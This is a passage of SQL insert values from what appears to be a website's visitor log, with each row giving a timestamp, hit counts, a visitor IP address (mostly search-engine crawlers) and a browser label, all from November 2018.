333031,1542310044,1,1,0,0,'54.36.148.18','other'),(333032,1542310089,1,1,0,0,'54.36.148.118','other'),(333033,1542310113,1,1,0,0,'54.36.148.150','other'),(333034,1542310193,1,1,0,0,'54.36.148.83','other'),(333035,1542310230,1,1,0,0,'54.36.148.239','other'),(333036,1542310266,1,1,0,0,'8.29.198.27','other'),(333037,1542310310,1,1,0,0,'54.36.149.39','other'),(333038,1542310369,1,1,0,0,'54.36.148.153','other'),(333039,1542310415,1,1,0,0,'54.36.148.41','other'),(333040,1542310444,2,2,0,0,'54.36.149.103','other'),(333041,1542310547,1,1,0,0,'46.229.168.130','other'),(333042,1542310553,1,1,0,0,'46.229.168.147','other'),(333043,1542310611,1,1,0,0,'54.36.148.164','other'),(333044,1542310675,1,1,0,0,'66.249.75.22','chrome'),(333045,1542310699,1,1,0,0,'54.36.148.214','other'),(333046,1542310766,1,1,0,0,'66.249.75.20','chrome'),(333047,1542310939,1,1,0,0,'54.36.149.62','other'),(333048,1542310947,1,1,0,0,'54.36.148.10','other'),(333049,1542311015,1,1,0,0,'54.36.148.152','other'),(333050,1542311062,1,1,0,0,'54.36.149.68','other'),(333051,1542311096,1,1,0,0,'54.36.149.97','other'),(333052,1542311342,1,1,0,0,'95.163.255.95','other'),(333053,1542311346,1,1,0,0,'95.163.255.97','other'),(333054,1542311365,1,1,0,0,'54.36.149.86','other'),(333055,1542311431,1,1,0,0,'54.36.148.246','other'),(333056,1542311436,1,1,0,0,'54.36.148.105','other'),(333057,1542311462,1,1,0,0,'54.36.149.26','other'),(333058,1542311513,1,1,0,0,'54.36.148.84','other'),(333059,1542311553,4,4,0,0,'216.244.66.241','other'),(333060,1542311603,1,1,0,0,'54.36.149.103','other'),(333061,1542311668,1,1,0,0,'54.36.148.85','other'),(333062,1542311742,1,1,0,0,'8.29.198.26','other'),(333063,1542311864,1,1,0,0,'54.36.148.42','other'),(333064,1542312015,1,1,0,0,'54.36.149.17','other'),(333065,1542312107,1,1,0,0,'54.36.148.22','other'),(333066,1542312180,1,1,0,0,'54.36.148.169','other'),(333067,1542312217,2,2,0,0,'207.46.13.224','other'),(333068,1542312247,1,1,0,0,'54.36.148.210','other'),(333069,1542312307,1,1,0,0,'54.36.149.45','other'),(333070,1542312371,1,1,0,0,'8.29.198.25','other'),(333071,1542312484,2,2,0,0,'54.36.148.235','other'),(333072,1542312620,1,1,0,0,'54.36.149.0','other'),(333073,1542312676,1,1,0,0,'54.36.148.94','other'),(333074,1542312692,1,1,0,0,'54.36.148.238','other'),(333075,1542313008,1,1,0,0,'54.36.148.140','other'),(333076,1542313089,1,1,0,0,'54.36.149.22','other'),(333077,1542313119,1,1,0,0,'54.36.148.19','other'),(333078,1542313139,1,1,0,0,'54.36.148.129','other'),(333079,1542313152,1,1,0,0,'54.36.148.41','other'),(333080,1542313190,2,2,0,0,'40.77.167.209','other'),(333081,1542313342,6,6,0,0,'178.154.244.29','other'),(333082,1542313374,1,1,0,0,'54.36.148.250','other'),(333083,1542313381,1,1,0,0,'54.36.148.127','other'),(333084,1542313383,1,1,0,0,'207.46.13.207','other'),(333085,1542313422,1,1,0,0,'54.36.149.41','other'),(333086,1542313431,1,1,0,0,'54.36.148.89','other'),(333087,1542313501,1,1,0,0,'207.46.13.224','other'),(333088,1542313506,1,1,0,0,'40.77.167.183','other'),(333089,1542313523,2,2,0,0,'5.45.207.79','other'),(333090,1542313580,5,5,0,0,'178.154.244.11','other'),(333091,1542313591,1,1,0,0,'54.36.149.42','other'),(333092,1542313707,1,1,0,0,'5.45.207.19','other'),(333093,1542313891,1,1,0,0,'40.77.167.198','other'),(333094,1542313901,1,1,0,0,'54.36.148.118','other'),(333095,1542313934,1,1,0,0,'54.36.148.154','other'),(333096,1542314064,2,2,0,0,'141.8.142.191','other'),(333097,1542314074,2,2,0,0,'95.108.181.54','other'),(333098,1542314130,1,1,0,0,'54.36.149.37','other'),(333099,1542314162,1,1,0,0,'54.36.148.53','other'),(333100,1542314184,1,1,0,0,'54.36.148.24','other'),(333101,1542314189,1,1,0,0,'87.250.224.65','other'),(333102,1542314225,1,1,0,0,'213.180.203.53','other'),(333103,1542314237,2,2,0,0,'141.8.142.103','other'),(333104,1542314238,4,4,0,0,'216.244.66.241','other'),(333105,1542314245,2,2,0,0,'178.154.244.49','other'),(333106,1542314253,1,1,0,0,'54.36.148.213','other'),(333107,1542314297,2,2,0,0,'141.8.183.23','other'),(333108,1542314309,2,2,0,0,'40.77.167.209','other'),(333109,1542314337,1,1,0,0,'66.249.75.15','chrome'),(333111,1542314446,1,1,0,0,'54.36.148.155','other'),(333112,1542314519,3,3,0,0,'178.154.171.69','other'),(333113,1542314591,2,2,0,0,'95.108.181.83','other'),(333114,1542314707,1,1,0,0,'40.77.167.183','other'),(333115,1542314742,2,2,0,0,'95.108.213.4','other'),(333116,1542314758,1,1,0,0,'54.36.148.45','other'),(333117,1542314779,2,2,0,0,'178.154.244.11','other'),(333118,1542314809,2,2,0,0,'5.45.207.19','other'),(333119,1542314887,1,1,0,0,'66.249.75.22','chrome'),(333120,1542314891,1,1,0,0,'54.36.148.240','other'),(333122,1542314960,1,1,0,0,'141.8.183.22','other'),(333123,1542314983,1,1,0,0,'54.36.148.123','other'),(333124,1542315025,1,1,0,0,'66.249.69.150','chrome'),(333125,1542315094,1,1,0,0,'95.108.213.50','other'),(333126,1542315114,2,2,0,0,'213.180.203.17','other'),(333127,1542315189,1,1,0,0,'54.36.148.91','other'),(333128,1542315319,1,1,0,0,'95.163.255.109','other'),(333129,1542315325,1,1,0,0,'141.8.183.23','other'),(333130,1542315326,1,1,0,0,'95.163.255.113','other'),(333131,1542315444,2,2,0,0,'54.36.149.47','other'),(333132,1542315558,1,1,0,0,'213.180.203.23','other'),(333133,1542315607,1,1,0,0,'141.8.142.191','other'),(333134,1542315634,1,1,0,0,'54.36.149.26','other'),(333135,1542315721,2,2,0,0,'40.77.167.183','other'),(333136,1542315725,1,1,0,0,'207.46.13.224','other'),(333137,1542315919,1,1,0,0,'5.255.253.25','other'),(333138,1542315973,1,1,0,0,'178.154.200.48','other'),(333139,1542316144,1,1,0,0,'54.36.149.19','other'),(333140,1542316147,1,1,0,0,'207.46.13.169','other'),(333141,1542316251,1,1,0,0,'54.36.148.44','other'),(333142,1542316272,1,1,0,0,'54.36.148.208','other'),(333143,1542316315,1,1,0,0,'95.108.181.54','other'),(333144,1542316336,1,1,0,0,'54.36.148.186','other'),(333145,1542316571,1,1,0,0,'54.36.148.99','other'),(333146,1542316678,4,4,0,0,'216.244.66.241','other'),(333147,1542316779,1,1,0,0,'54.36.149.13','other'),(333148,1542316848,1,1,0,0,'157.55.39.212','other'),(333149,1542316946,1,1,0,0,'54.36.148.136','other'),(333150,1542317201,1,1,0,0,'54.36.149.73','other'),(333151,1542317223,1,1,0,0,'54.36.148.161','other'),(333152,1542317365,1,1,0,0,'54.36.148.110','other'),(333153,1542317392,1,1,0,0,'54.36.148.231','other'),(333154,1542317599,1,1,0,0,'40.77.167.198','other'),(333155,1542317603,1,1,0,0,'40.77.167.209','other'),(333156,1542317636,1,1,0,0,'54.36.148.127','other'),(333157,1542317654,1,1,0,0,'54.36.149.99','other'),(333158,1542317668,1,1,0,0,'54.36.149.20','other'),(333159,1542317707,2,2,0,0,'54.165.59.7','other'),(333160,1542317744,2,2,0,0,'216.244.66.241','other'),(333161,1542317871,1,1,0,0,'54.36.148.185','other'),(333162,1542318035,1,1,0,0,'54.36.148.255','other'),(333163,1542318241,1,1,0,0,'54.36.149.80','other'),(333164,1542318387,1,1,0,0,'54.36.149.73','other'),(333165,1542318554,1,1,0,0,'54.36.148.183','other'),(333166,1542318567,1,1,0,0,'54.36.149.56','other'),(333167,1542318702,1,1,0,0,'54.36.148.124','other'),(333168,1542318750,1,1,0,0,'54.36.148.147','other'),(333169,1542318759,7,7,0,0,'216.244.66.241','other'),(333170,1542318776,1,1,0,0,'54.36.148.95','other'),(333171,1542318860,2,2,0,0,'54.36.148.206','other'),(333172,1542319126,1,1,0,0,'54.36.149.45','other'),(333173,1542319522,3,3,0,0,'40.77.167.183','other'),(333174,1542319669,1,1,0,0,'54.36.148.112','other'),(333175,1542319703,1,1,0,0,'54.36.148.93','other'),(333176,1542319829,1,1,0,0,'40.77.167.198','other'),(333177,1542319833,2,2,0,0,'40.77.167.209','other'),(333178,1542319838,1,1,0,0,'207.46.13.224','other'),(333179,1542319953,1,1,0,0,'54.36.148.96','other'),(333180,1542319977,1,1,0,0,'54.36.149.25','other'),(333181,1542320037,1,1,0,0,'54.36.149.16','other'),(333182,1542320104,1,1,0,0,'54.36.149.73','other'),(333183,1542320313,1,1,0,0,'216.244.66.241','other'),(333184,1542320316,1,1,0,0,'54.36.148.55','other'),(333185,1542320421,1,1,0,0,'54.36.148.238','other'),(333186,1542320446,1,1,0,0,'54.36.148.20','other'),(333187,1542320451,1,1,0,0,'54.36.149.59','other'),(333188,1542320584,1,1,0,0,'54.36.149.68','other'),(333189,1542320680,1,1,0,0,'178.154.244.29','other'),(333190,1542320815,1,1,0,0,'54.36.148.27','other'),(333191,1542320959,1,1,0,0,'54.36.148.91','other'),(333192,1542321066,1,1,0,0,'54.36.148.203','other'),(333193,1542321101,1,1,0,0,'8.29.198.27','other'),(333194,1542321126,1,1,0,0,'46.229.168.135','other'),(333195,1542321138,2,2,0,0,'207.46.13.169','other'),(333196,1542321144,1,1,0,0,'178.154.244.11','other'),(333197,1542321147,1,1,0,0,'95.108.213.4','other'),(333198,1542321181,1,1,0,0,'54.36.149.1','other'),(333199,1542321357,1,1,0,0,'54.36.149.59','other'),(333200,1542321378,4,4,0,0,'216.244.66.241','other'),(333201,1542321412,1,1,0,0,'54.36.148.79','other'),(333202,1542321478,1,1,0,0,'54.165.59.7','other'),(333203,1542321516,1,1,0,0,'54.36.148.76','other'),(333204,1542321682,1,1,0,0,'207.46.13.224','other'),(333205,1542321690,1,1,0,0,'54.36.148.61','other'),(333206,1542321779,1,1,0,0,'66.249.75.17','chrome'),(333207,1542321869,1,1,0,0,'54.36.148.249','other'),(333208,1542321975,1,1,0,0,'95.163.255.95','other'),(333209,1542321977,1,1,0,0,'95.163.255.97','other'),(333210,1542321992,1,1,0,0,'54.36.148.22','other'),(333211,1542322054,1,1,0,0,'54.36.148.247','other'),(333212,1542322131,1,1,0,0,'54.36.149.19','other'),(333213,1542322158,1,1,0,0,'54.36.148.129','other'),(333214,1542322188,1,1,0,0,'54.36.148.17','other'),(333215,1542322225,1,1,0,0,'66.249.69.145','chrome'),(333216,1542322226,1,1,0,0,'66.249.69.149','chrome'),(333217,1542322314,1,1,0,0,'54.36.148.92','other'),(333218,1542322504,3,3,0,0,'216.244.66.241','other'),(333219,1542322506,1,1,0,0,'54.36.149.101','other'),(333220,1542322557,1,1,0,0,'54.36.148.145','other'),(333221,1542322582,2,2,0,0,'8.29.198.26','other'),(333222,1542322636,1,1,0,0,'54.36.148.230','other'),(333223,1542322662,1,1,0,0,'54.165.59.7','other'),(333224,1542322684,1,1,0,0,'54.36.148.126','other'),(333225,1542322703,1,1,0,0,'54.36.148.158','other'),(333226,1542322736,2,2,0,0,'178.154.244.29','other'),(333227,1542322831,1,1,0,0,'54.36.148.137','other'),(333228,1542322868,1,1,0,0,'54.36.149.7','other'),(333229,1542323269,1,1,0,0,'54.36.148.23','other'),(333230,1542323308,1,1,0,0,'54.36.148.196','other'),(333231,1542323382,1,1,0,0,'54.36.148.46','other'),(333232,1542323450,1,1,0,0,'66.249.75.21','chrome'),(333233,1542323557,1,1,0,0,'54.36.148.216','other'),(333234,1542323596,1,1,0,0,'54.36.148.16','other'),(333235,1542323632,1,1,0,0,'54.36.148.145','other'),(333236,1542323912,1,1,0,0,'66.249.69.200','chrome'),(333237,1542324028,1,1,0,0,'157.55.39.212','other'),(333238,1542324142,1,1,0,0,'54.36.148.202','other'),(333239,1542324143,1,1,0,0,'54.36.149.100','other'),(333240,1542324153,1,1,0,0,'54.36.149.97','other'),(333241,1542324198,1,1,0,0,'54.36.148.214','other'),(333242,1542324211,8,8,0,0,'216.244.66.241','other'),(333243,1542324271,1,1,0,0,'54.36.148.201','other'),(333244,1542324428,1,1,0,0,'54.36.148.111','other'),(333245,1542324662,1,1,0,0,'54.36.148.99','other'),(333246,1542324894,1,1,0,0,'54.36.148.16','other'),(333247,1542325071,1,1,0,0,'46.229.168.144','other'),(333248,1542325113,1,1,0,0,'54.36.149.52','other'),(333249,1542325249,1,1,0,0,'54.36.148.103','other'),(333250,1542325261,1,1,0,0,'54.36.148.117','other'),(333251,1542325308,1,1,0,0,'54.36.148.53','other'),(333252,1542325336,1,1,0,0,'54.36.148.106','other'),(333253,1542325340,1,1,0,0,'54.36.149.34','other'),(333254,1542325390,1,1,0,0,'54.36.148.140','other'),(333255,1542325484,1,1,0,0,'54.36.148.203','other'),(333256,1542325539,1,1,0,0,'54.36.149.0','other'),(333257,1542325662,1,1,0,0,'54.36.148.14','other'),(333258,1542325670,1,1,0,0,'54.36.148.111','other'),(333259,1542325727,1,1,0,0,'54.36.148.250','other'),(333260,1542325782,1,1,0,0,'207.46.13.207','other'),(333261,1542325827,1,1,0,0,'54.36.148.255','other'),(333262,1542325876,1,1,0,0,'54.36.148.96','other'),(333263,1542325960,1,1,0,0,'54.36.149.83','other'),(333264,1542326018,1,1,0,0,'54.36.149.59','other'),(333265,1542326155,1,1,0,0,'193.171.202.150','other'),(333266,1542326166,1,1,0,0,'185.24.218.178','other'),(333267,1542326296,1,1,0,0,'54.36.148.249','other'),(333268,1542326417,1,1,0,0,'54.36.148.51','other'),(333269,1542326478,1,1,0,0,'54.36.148.91','other'),(333270,1542326512,1,1,0,0,'54.36.149.56','other'),(333271,1542326566,1,1,0,0,'54.36.148.171','other'),(333272,1542326572,1,1,0,0,'54.36.148.183','other'),(333273,1542326574,1,1,0,0,'46.229.168.151','other'),(333274,1542326597,1,1,0,0,'66.249.69.204','chrome'),(333275,1542326710,1,1,0,0,'54.36.148.76','other'),(333276,1542326718,1,1,0,0,'54.36.148.65','other'),(333277,1542327088,6,6,0,0,'216.244.66.241','other'),(333278,1542327220,1,1,0,0,'54.36.148.153','other'),(333279,1542327353,1,1,0,0,'66.249.69.221','chrome'),(333281,1542327416,2,2,0,0,'54.36.148.206','other'),(333282,1542327448,1,1,0,0,'54.36.148.205','other'),(333283,1542327464,1,1,0,0,'207.46.13.172','other'),(333284,1542327488,1,1,0,0,'207.46.13.169','other'),(333285,1542327541,1,1,0,0,'54.36.148.63','other'),(333286,1542327585,1,1,0,0,'54.36.148.39','other'),(333287,1542327623,1,1,0,0,'54.36.148.103','other'),(333288,1542327698,1,1,0,0,'54.36.148.180','other'),(333289,1542327728,1,1,0,0,'54.36.148.33','other'),(333290,1542327733,1,1,0,0,'54.36.149.68','other'),(333291,1542327815,1,1,0,0,'54.36.148.142','other'),(333292,1542327844,1,1,0,0,'54.36.149.7','other'),(333293,1542327911,1,1,0,0,'54.36.149.90','other'),(333294,1542328151,1,1,0,0,'157.55.39.212','other'),(333295,1542328190,1,1,0,0,'54.36.149.3','other'),(333296,1542328268,1,1,0,0,'54.36.148.70','other'),(333297,1542328347,1,1,0,0,'46.229.168.141','other'),(333298,1542328362,1,1,0,0,'54.165.59.7','other'),(333299,1542328519,1,1,0,0,'54.36.148.120','other'),(333300,1542328572,1,1,0,0,'54.36.148.53','other'),(333301,1542328588,1,1,0,0,'46.229.168.129','other'),(333302,1542328590,1,1,0,0,'46.229.168.130','other'),(333303,1542328622,2,2,0,0,'207.46.13.207','other'),(333304,1542328720,2,2,0,0,'207.46.13.224','other'),(333305,1542328848,1,1,0,0,'54.36.148.250','other'),(333306,1542328901,1,1,0,0,'54.36.148.91','other'),(333307,1542328982,1,1,0,0,'54.36.148.31','other'),(333308,1542329042,1,1,0,0,'54.36.148.40','other'),(333309,1542329176,1,1,0,0,'66.249.69.145','chrome'),(333310,1542329177,1,1,0,0,'66.249.69.149','chrome'),(333311,1542329244,1,1,0,0,'54.36.148.186','other'),(333312,1542329306,1,1,0,0,'54.36.148.47','other'),(333313,1542329312,2,2,0,0,'66.249.69.200','chrome'),(333314,1542329444,1,1,0,0,'54.36.149.23','other'),(333315,1542329486,1,1,0,0,'54.36.148.217','other'),(333316,1542329673,11,11,0,0,'178.154.244.29','other'),(333317,1542329682,5,5,0,0,'5.45.207.79','other'),(333318,1542329695,10,10,0,0,'178.154.244.11','other'),(333319,1542329764,1,1,0,0,'102.165.37.114','other'),(333320,1542329807,1,1,0,0,'54.36.148.227','other'),(333321,1542329811,1,1,0,0,'54.36.148.220','other'),(333322,1542329882,1,1,0,0,'46.229.168.129','other'),(333323,1542329884,1,1,0,0,'46.229.168.132','other'),(333324,1542329918,1,1,0,0,'54.36.148.139','other'),(333325,1542329920,1,1,0,0,'54.36.148.99','other'),(333326,1542329947,1,1,0,0,'5.45.207.19','other'),(333327,1542330209,1,1,0,0,'54.36.148.54','other'),(333328,1542330219,1,1,0,0,'54.36.149.94','other'),(333329,1542330243,1,1,0,0,'54.36.148.155','other'),(333330,1542330273,2,2,0,0,'141.8.142.103','other'),(333331,1542330341,1,1,0,0,'217.182.203.54','chrome'),(333332,1542330459,1,1,0,0,'54.36.148.255','other'),(333333,1542330575,1,1,0,0,'46.229.168.150','other'),(333334,1542330579,1,1,0,0,'46.229.168.153','other'),(333336,1542330688,1,1,0,0,'213.180.203.40','other'),(333337,1542330690,1,1,0,0,'87.250.224.64','other'),(333338,1542330691,1,1,0,0,'141.8.132.16','other'),(333339,1542330779,1,1,0,0,'66.249.75.15','chrome'),(333340,1542330780,1,1,0,0,'66.249.75.20','chrome'),(333341,1542330872,1,1,0,0,'54.36.149.36','other'),(333342,1542330895,1,1,0,0,'54.36.148.82','other'),(333343,1542330918,1,1,0,0,'54.36.149.90','other'),(333344,1542330925,1,1,0,0,'54.36.148.42','other'),(333345,1542330975,1,1,0,0,'54.36.148.237','other'),(333346,1542330993,1,1,0,0,'5.255.253.16','other'),(333347,1542331003,1,1,0,0,'212.129.3.60','firefox'),(333348,1542331013,1,1,0,0,'178.154.200.48','other'),(333349,1542331016,1,1,0,0,'54.36.148.200','other'),(333350,1542331076,1,1,0,0,'54.36.148.132','other'),(333351,1542331212,1,1,0,0,'54.36.149.92','other'),(333352,1542331214,1,1,0,0,'54.36.148.228','other'),(333353,1542331218,1,1,0,0,'66.249.69.202','chrome'),(333354,1542331259,1,1,0,0,'54.36.148.187','other'),(333355,1542331310,1,1,0,0,'54.36.148.11','other'),(333356,1542331357,1,1,0,0,'54.36.148.44','other'),(333357,1542331421,1,1,0,0,'54.36.148.229','other'),(333358,1542331425,1,1,0,0,'213.180.203.53','other'),(333359,1542331440,1,1,0,0,'54.36.149.13','other'),(333360,1542331482,1,1,0,0,'54.36.148.96','other'),(333361,1542331488,1,1,0,0,'54.36.148.51','other'),(333362,1542331564,1,1,0,0,'46.229.168.153','other'),(333363,1542331566,1,1,0,0,'46.229.168.132','other'),(333364,1542331747,1,1,0,0,'66.249.75.21','chrome'),(333365,1542331818,1,1,0,0,'5.188.210.52','chrome'),(333366,1542331922,4,4,0,0,'216.244.66.241','other'),(333367,1542331938,1,1,0,0,'8.29.198.27','other'),(333368,1542331967,1,1,0,0,'54.36.148.146','other'),(333369,1542332015,1,1,0,0,'54.36.149.19','other'),(333370,1542332050,1,1,0,0,'157.55.39.212','other'),(333371,1542332084,1,1,0,0,'54.36.148.22','other'),(333372,1542332104,1,1,0,0,'54.36.148.68','other'),(333373,1542332198,3,3,0,0,'178.154.244.29','other'),(333374,1542332319,1,1,0,0,'54.36.148.84','other'),(333375,1542332355,1,1,0,0,'46.229.168.150','other'),(333376,1542332358,1,1,0,0,'46.229.168.139','other'),(333377,1542332374,1,1,0,0,'54.36.149.23','other'),(333378,1542332424,1,1,0,0,'54.36.148.14','other'),(333379,1542332435,1,1,0,0,'54.36.148.158','other'),(333380,1542332574,1,1,0,0,'54.36.148.156','other'),(333381,1542332738,1,1,0,0,'66.249.69.144','chrome'),(333383,1542332760,1,1,0,0,'46.229.168.147','other'),(333384,1542332777,1,1,0,0,'54.36.149.79','other'),(333385,1542332954,1,1,0,0,'54.36.149.38','other'),(333386,1542332964,1,1,0,0,'54.36.149.89','other'),(333387,1542332972,1,1,0,0,'54.36.148.228','other'),(333388,1542333165,1,1,0,0,'216.244.66.241','other'),(333389,1542333253,2,2,0,0,'40.77.167.198','other'),(333390,1542333393,1,1,0,0,'54.36.149.61','other'),(333391,1542333447,1,1,0,0,'8.29.198.27','other'),(333392,1542333474,1,1,0,0,'54.36.148.142','other'),(333393,1542333553,2,2,0,0,'207.46.13.224','other'),(333394,1542333599,1,1,0,0,'54.36.148.72','other'),(333395,1542333733,1,1,0,0,'54.36.148.100','other'),(333396,1542333833,1,1,0,0,'54.36.149.7','other'),(333397,1542333847,1,1,0,0,'40.77.167.183','other'),(333398,1542333865,1,1,0,0,'46.229.168.143','other'),(333399,1542333867,1,1,0,0,'46.229.168.137','other'),(333400,1542334044,1,1,0,0,'8.29.198.26','other'),(333401,1542334059,1,1,0,0,'54.36.148.170','other'),(333402,1542334111,1,1,0,0,'54.36.148.175','other'),(333403,1542334120,1,1,0,0,'54.36.148.59','other'),(333404,1542334224,1,1,0,0,'54.36.148.178','other'),(333405,1542334332,1,1,0,0,'54.36.148.92','other'),(333406,1542334375,1,1,0,0,'54.36.148.39','other'),(333407,1542334401,1,1,0,0,'54.36.148.198','other'),(333408,1542334459,1,1,0,0,'46.229.168.139','other'),(333409,1542334797,6,6,0,0,'216.244.66.241','other'),(333410,1542334878,2,2,0,0,'34.216.196.105','chrome'),(333411,1542335051,1,1,0,0,'54.36.148.54','other'),(333412,1542335115,2,2,0,0,'207.46.13.224','other'),(333413,1542335566,1,1,0,0,'54.36.148.127','other'),(333414,1542335577,1,1,0,0,'54.36.148.255','other'),(333415,1542335602,1,1,0,0,'54.36.149.17','other'),(333416,1542335723,1,1,0,0,'54.36.148.121','other'),(333417,1542335835,1,1,0,0,'46.229.168.138','other'),(333418,1542335840,2,2,0,0,'46.229.168.147','other'),(333419,1542335875,1,1,0,0,'54.36.148.102','other'),(333420,1542335996,1,1,0,0,'207.46.13.172','other'),(333421,1542336128,1,1,0,0,'46.229.168.149','other'),(333422,1542336394,1,1,0,0,'54.36.148.130','other'),(333423,1542336448,1,1,0,0,'54.36.148.53','other'),(333424,1542336588,1,1,0,0,'54.36.149.33','other'),(333425,1542336680,1,1,0,0,'178.154.171.30','other'),(333426,1542336776,1,1,0,0,'54.36.148.88','other'),(333427,1542336898,1,1,0,0,'54.36.148.152','other'),(333428,1542337050,4,4,0,0,'216.244.66.241','other'),(333429,1542337178,1,1,0,0,'46.229.168.129','other'),(333430,1542337220,1,1,0,0,'54.36.148.180','other'),(333431,1542337226,1,1,0,0,'54.36.148.183','other'),(333432,1542337322,1,1,0,0,'54.36.149.100','other'),(333433,1542337716,1,1,0,0,'54.36.149.30','other'),(333434,1542337930,1,1,0,0,'54.36.148.108','other'),(333435,1542338014,1,1,0,0,'54.36.148.164','other'),(333436,1542338021,1,1,0,0,'54.36.148.148','other'),(333437,1542338052,1,1,0,0,'54.36.148.249','other'),(333438,1542338304,1,1,0,0,'40.77.167.198','other'),(333439,1542338308,1,1,0,0,'207.46.13.224','other'),(333440,1542338335,1,1,0,0,'54.36.148.192','other'),(333441,1542338493,1,1,0,0,'54.36.149.70','other'),(333442,1542338543,1,1,0,0,'54.36.148.158','other'),(333443,1542338784,1,1,0,0,'66.249.69.202','chrome'),(333444,1542338835,1,1,0,0,'54.36.148.85','other'),(333445,1542339033,1,1,0,0,'54.36.148.58','other'),(333446,1542339163,1,1,0,0,'54.36.149.0','other'),(333447,1542339200,1,1,0,0,'54.36.148.106','other'),(333448,1542339263,1,1,0,0,'54.36.149.44','other'),(333449,1542339390,1,1,0,0,'157.55.39.212','other'),(333450,1542339496,1,1,0,0,'54.36.148.193','other'),(333451,1542339503,1,1,0,0,'54.36.148.13','other'),(333452,1542339612,1,1,0,0,'54.36.149.82','other'),(333453,1542339662,1,1,0,0,'54.36.148.249','other'),(333454,1542339851,3,3,0,0,'216.244.66.241','other'),(333455,1542340040,1,1,0,0,'46.229.168.141','other'),(333456,1542340041,1,1,0,0,'54.36.148.50','other'),(333457,1542340043,1,1,0,0,'46.229.168.132','other'),(333458,1542340070,1,1,0,0,'54.36.149.14','other'),(333459,1542340119,1,1,0,0,'54.36.148.43','other'),(333460,1542340342,1,1,0,0,'54.36.148.152','other'),(333461,1542340650,1,1,0,0,'54.36.148.202','other'),(333462,1542340838,1,1,0,0,'54.36.148.253','other'),(333463,1542340860,1,1,0,0,'54.36.148.177','other'),(333464,1542340938,1,0,1,0,'66.249.69.221',''),(333466,1542341095,1,1,0,0,'54.36.148.89','other'),(333467,1542341138,1,1,0,0,'54.36.148.135','other'),(333468,1542341215,3,3,0,0,'66.249.69.149','chrome'),(333469,1542341219,1,1,0,0,'46.229.168.134','other'),(333470,1542341223,1,1,0,0,'46.229.168.133','other'),(333471,1542341300,1,1,0,0,'54.36.149.84','other'),(333472,1542341375,1,1,0,0,'66.249.69.204','chrome'),(333473,1542341380,1,1,0,0,'66.249.69.202','chrome'),(333474,1542341386,2,2,0,0,'40.77.167.183','other'),(333475,1542341435,1,1,0,0,'54.36.148.92','other'),(333476,1542341548,1,1,0,0,'54.36.149.78','other'),(333477,1542341681,1,1,0,0,'66.249.69.150','chrome'),(333478,1542341690,2,2,0,0,'66.249.69.221','chrome'),(333479,1542341698,1,1,0,0,'66.249.69.200','chrome'),(333480,1542341750,1,1,0,0,'54.36.148.119','other'),(333481,1542341828,1,1,0,0,'54.36.148.179','other'),(333482,1542341861,5,5,0,0,'66.249.75.20','chrome'),(333483,1542341867,2,2,0,0,'207.46.13.224','other'),(333484,1542341896,1,1,0,0,'46.229.168.150','other'),(333485,1542341982,1,1,0,0,'54.36.148.215','other'),(333486,1542342113,1,1,0,0,'46.229.168.153','other'),(333487,1542342116,1,1,0,0,'54.36.149.69','other'),(333488,1542342165,1,1,0,0,'40.77.167.198','other'),(333489,1542342370,3,3,0,0,'216.244.66.241','other'),(333490,1542342405,2,2,0,0,'66.249.75.21','chrome'),(333491,1542342406,1,1,0,0,'54.36.149.41','other'),(333492,1542342449,2,2,0,0,'157.55.39.212','other'),(333493,1542342493,1,1,0,0,'54.36.149.28','other'),(333494,1542342529,1,1,0,0,'66.249.69.204','chrome'),(333495,1542342564,2,2,0,0,'66.249.75.17','chrome'),(333496,1542342576,1,1,0,0,'66.249.75.16','chrome'),(333497,1542342582,1,1,0,0,'66.249.75.15','chrome'),(333498,1542342624,1,1,0,0,'54.36.148.109','other'),(333499,1542342626,1,1,0,0,'54.36.148.162','other'),(333500,1542342698,1,1,0,0,'95.163.255.97','other'),(333501,1542342700,1,1,0,0,'95.163.255.94','other'),(333502,1542342721,1,1,0,0,'54.36.149.99','other'),(333503,1542342750,1,1,0,0,'54.36.148.86','other'),(333504,1542342771,1,1,0,0,'8.29.198.25','other'),(333505,1542342908,1,1,0,0,'66.249.75.20','chrome'),(333506,1542343048,1,1,0,0,'54.36.149.22','other'),(333507,1542343095,9,9,0,0,'178.154.244.29','other'),(333508,1542343102,7,7,0,0,'178.154.244.11','other'),(333509,1542343107,1,1,0,0,'54.36.149.73','other'),(333510,1542343188,1,1,0,0,'37.9.113.148','other'),(333511,1542343366,2,2,0,0,'216.244.66.241','other'),(333512,1542343403,1,1,0,0,'54.36.148.149','other'),(333513,1542343663,1,1,0,0,'54.36.148.200','other'),(333514,1542343788,1,1,0,0,'54.36.148.163','other'),(333515,1542343901,1,1,0,0,'54.36.149.90','other'),(333516,1542343970,1,1,0,0,'54.36.148.109','other'),(333517,1542344007,1,1,0,0,'54.36.148.135','other'),(333518,1542344017,1,1,0,0,'54.36.148.192','other'),(333519,1542344023,1,1,0,0,'141.8.142.103','other'),(333520,1542344025,1,1,0,0,'37.9.113.20','other'),(333521,1542344040,1,1,0,0,'54.36.149.50','other'),(333522,1542344191,1,1,0,0,'54.36.149.5','other'),(333523,1542344287,1,1,0,0,'8.29.198.27','other'),(333524,1542344315,1,1,0,0,'54.36.149.89','other'),(333525,1542344371,1,1,0,0,'46.229.168.134','other'),(333526,1542344500,1,1,0,0,'54.36.148.22','other'),(333527,1542344510,1,1,0,0,'54.36.149.80','other'),(333528,1542344665,1,1,0,0,'40.77.167.192','other'),(333529,1542344792,1,1,0,0,'54.36.148.224','other'),(333530,1542344802,1,1,0,0,'54.36.148.143','other'),(333531,1542344870,1,1,0,0,'54.36.148.191','other'),(333532,1542344887,1,1,0,0,'8.29.198.25','other'),(333533,1542345015,5,5,0,0,'216.244.66.241','other'),(333534,1542345259,1,1,0,0,'95.163.255.63','other'),(333535,1542345261,1,1,0,0,'95.163.255.64','other'),(333536,1542345526,1,1,0,0,'54.36.149.99','other'),(333537,1542345564,1,1,0,0,'180.76.15.29','other'),(333538,1542345565,1,1,0,0,'180.76.15.152','other'),(333539,1542345743,1,1,0,0,'54.36.148.144','other'),(333540,1542346044,1,1,0,0,'46.229.168.144','other'),(333541,1542346047,1,1,0,0,'46.229.168.132','other'),(333542,1542346139,1,1,0,0,'54.36.148.175','other'),(333543,1542346468,1,1,0,0,'54.36.148.153','other'),(333544,1542346527,8,8,0,0,'95.216.5.188','other'),(333545,1542346578,1,1,0,0,'95.163.255.103','other'),(333546,1542346581,1,1,0,0,'95.163.255.108','other'),(333547,1542346705,1,1,0,0,'207.46.13.169','other'),(333548,1542346852,1,1,0,0,'54.36.148.164','other'),(333549,1542346872,1,1,0,0,'54.36.148.45','other'),(333550,1542347124,1,1,0,0,'54.36.148.177','other'),(333551,1542347135,1,1,0,0,'54.